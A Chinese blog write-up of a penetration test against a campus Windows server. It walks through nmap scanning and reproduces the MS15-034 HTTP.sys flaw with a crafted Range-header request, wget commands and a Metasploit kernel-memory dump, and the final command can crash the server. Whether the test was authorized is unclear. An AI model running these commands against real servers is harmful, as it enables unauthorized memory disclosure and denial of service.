针对校园某服务器的一次渗透测试
发现学校其中一台服务器可能(绝对)存在漏洞。我想(绝对)能拿下它;
而且渗透测试的过程很有趣,便将其记录下来。
0x00 前期交互及信息收集
由于是对内网直接进行大扫描,所以直接判断这不仅是一个Web服务器(多个),同时还运行着FTP、数据库。
在此,再次使用nmap扫描一次,结果如下:
$ sudo nmap -T4 -n -sS -sV -O 192.168.3.72
Nmap scan report for 192.168.3.72
Host is up (0.00076s latency).
Not shown: 974 closed ports
PORT STATE SERVICE VERSION
7/tcp open echo
9/tcp open discard?
13/tcp open daytime?
17/tcp open qotd Windows qotd (English)
19/tcp open chargen
21/tcp open ftp FileZilla ftpd
42/tcp open tcpwrapped
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
999/tcp open http Apache httpd 2.4.33 ((Win32) OpenSSL/1.0.2o mod_fcgid/2.3.9 mod_jk/1.2.40)
1801/tcp open msmq?
2107/tcp open msrpc Microsoft Windows RPC
2383/tcp open ms-olap4?
3306/tcp open mysql MySQL 5.5.19
3389/tcp open ms-wbt-server?
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8082/tcp open http Microsoft IIS httpd 7.5
49152/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port13-TCP:V=7.70%I=7%D=8/13%Time=5D53656C%P=x86_64-unknown-linux-gnu%r
SF:(NULL,12,"23:35:37\x202019/8/13\n")%r(NCP,12,"23:35:37\x202019/8/13\n");
Device type: general purpose
Running: Microsoft Windows Vista|2008|7
OS CPE: cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_vista::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_7
OS details: Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
乍一看,跑了这么多服务。初步判断很可能有 vulnerabilities。
总结,这是一台操作系统为 Windows(目前未能确认具体版本)的、运行着FileZilla FTP、MySQL 5.5.19、Web等服务;而且开放了太多端口。
Web服务器端口: 80、999、8080、8082; 运行着这个几个Web服务。
不过经确认,只有999 Apache和8082 IIS两个端口提供的Web服务正常。
而且,999端口运行着phpMyAdmin(一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库),当然也是漏洞多多。
0x01 远程代码执行???
在我一顿瞎几掰操作下,其实是利用扫描器加手动验证;找到一个致命漏洞,该漏洞存在于端口 8082 IIS 服务器上。
MS15-034 复现
HTTP.sys 远程执行代码漏洞 - CVE-2015-1635
当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。通过修改 Windows HTTP 堆栈处理请求的方式,此更新可以修复此漏洞。
详细
根据微软安全公告,此漏洞貌似可以远程任意代码执行;但就实际复现来说,好像并不成立。
通过给 IIS 服务器发送如下 HTTP 请求,便可触发这个漏洞。
GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615
而我就直接使用的 wget 测试此漏洞,当然还可以使用 curl 和 MSF。
$ wget --header="Range: bytes=0-18446744073709551615" http://192.168.3.72:8082/Images/top01.gif
--2019-08-13 23:44:03-- http://192.168.3.72:8082/Images/top01.gif
Connecting to 192.168.3.72:8082... connected.
HTTP request sent, awaiting response... 416 Requested Range Not Satisfiable
The file is already fully retrieved; nothing to do.
如上请求包,若IIS服务器返回"Requested Range Not Satisfiable",则是存在漏洞,否则如果返回"The request has an invalid header name", 则说明漏洞已经修补。
进一步利用/危害
前面的远程任意代码执行并不成立;此漏洞就当前利用来说,只能造成两种危害。
我使用MSF来exploit利用方式。
如下,使用MSF读取服务器内核内存数据。
msf5 > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set RHOSTS 192.168.3.72
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set RPORT 8082
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set TARGETURI /Images/top01.gif
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > exploit
[+] Target may be vulnerable...
[+] Stand by...
[-] Memory dump start position not found, dumping all data instead
[+] Memory contents:
48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 |HTTP/1.1 400 Bad|
20 52 65 71 75 65 73 74 0d 0a 43 6f 6e 74 65 6e | Request..Conten|
74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d |t-Type: text/htm|
6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 |l; charset=us-as|
63 69 69 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 |cii..Server: Mic|
… … … … … … … … …
72 6f 73 6f 66 74 2d 48 54 54 50 41 50 49 2f 32 |rosoft-HTTPAPI/2|
45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 |Error 400. The r|
65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 |equest hostname |
69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d |is invalid.</p>.|
0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d |.</BODY></HTML>.|
0a |.|
[+] Memory dump saved to /home/f4n9x/.msf4/loot/20190814122223_default_192.168.3.72_iis.ms15034_317502.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
第二种,我直接使用 wget 命令。
$ wget --header="Range: bytes=18-18446744073709551615" http://192.168.3.72/Images/top01.gif
在敲这条命令时,我双手一直是抖的
针对校园某服务器的一次渗透测试相关推荐
- 怎么利用服务器端口爆破网站,渗透测试:域名爆破及端口扫描
#coding:utf-8 import os,sys,xml.dom.minidom,multiprocessing from sendmail import * from time import ...
- 渗透测试入门27之渗透测试学习建议
最近发现很多小伙伴都在问我想要学习渗透测试,但是不知道怎么开始,也不知道要学习什么?所以在这里我打算分享一下我的渗透学习之路以及给初学者的一些建议. 我的学习之路 转眼间,我从学习渗透测试到工作也快六 ...
- 渗透测试-CS架构客户端
网络架构模式 B/S和C/S都是随着互联网的发展而出现的一种网络结构模式,而其用的非常广泛,在我们生活中都很常见.那它们到底是什么呢?接下来就详细的介绍一下B/S和C/S. B/S架构 B是英文单词& ...
- Linux操作系统渗透测试
Linux操作系统渗透测试 任务环境说明: 服务器场景:Linux 服务器场景操作系统:Linux(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:ro ...
- LAND网络渗透测试
靶机地址:172.16.103.250 1.进入虚拟机操作系统:BT5中的/root目录,完善该目录下的land.py文件,填写该文件当中空缺的Flag1字符串,将该字符串作为Flag值(形式:Fla ...
- APP渗透测试 网站漏洞检测以及如何防止攻击
很多公司都有着自己的APP,包括安卓端以及ios端都有属于自己的APP应用,随着互联网的快速发展,APP安全也影响着整个公司的业务发展,前段时间有客户的APP被攻击,数据被篡改,支付地址也被修改成攻击 ...
- windows渗透测试
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案. 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统 ...
- 一次针对SAP系统的完美渗透测试
本文讲的是一次针对SAP系统的完美渗透测试, 什么是SAP 渗透测试? SAP为"System Applications and Products"的简称,是SAP公司的产品--企 ...
- 针对校园 移动 联通 路由器安装方法
Linux协会针对校园 移动 联通 路由器安装方法 准备材料: 路由器两个 Tip:记为路由器A B(路由器A可以使用任何一种路由器 路由器B需要支持L2TP功能 ) L2tp功能的路由器上淘宝输入 ...
最新文章
- 领导者有3个要求,你做到了吗?
- Python 执行js的2种解决方案-乾颐堂
- 使用DPM 2012 Sp1保护SQL server 2012 Sp1
- SAP SD基本业务总结
- Vista开发之旅:微软开发技术20年回顾
- 安卓逆向_10 --- Log 日志的插入和分析、toast方法、栈跟踪
- 使用react开发管理后台
- c# winform 应用编程代码总结 15
- 关于MFC中CSpinButtonCtrl控件
- shell 启动进程 问号_shell的问号
- win10计算器rsh_Win10系统有哪些计算器快捷键
- uniapp浏览pdf文件
- win10相机计算机无法使用,win10相机无法使用完美解决方法
- 牛客多校第八场 C CDMA 线性代数:沃尔什矩阵
- Online Convex Making Gradient Descent Optimal for Strongly Convex Stochastic Optimization
- Linux内核“问题门”——学习问题、经验集锦(持续更新中……)
- 如何编写c语言延时程序,单片机写延时程序的几种方法
- 为 什 么 说 Synchronized 是 非 公 平 锁
- 新买的电脑,设置电脑
- 栅极电阻硬并联与独立栅极电阻
热门文章
- python支持list类型吗_Python-不支持的操作数类型为%:“list”和“int”
- 产品经理必懂的技术那点事儿 pdf_培养一个合格的产品经理需要多少钱?
- Effective Java之请不要在新代码中使用原生态类型(二十三)
- 详细解读CSS链接属性——Web前端系列学习笔记
- mysql ddl 语法解析工具_sharding-sphere之语法解析器
- [java][工具类][Arrays]
- MySQL基本操作命令和数据表高级操作
- vue :class 动态绑定样式_Notes04vbind动态绑定class
- java构造器调用构造器_java中构造器内部调用构造器实例详解
- 人工智能诗歌写作平台_智能写作VS人工写作,Giiso写作机器人解放你的创造力...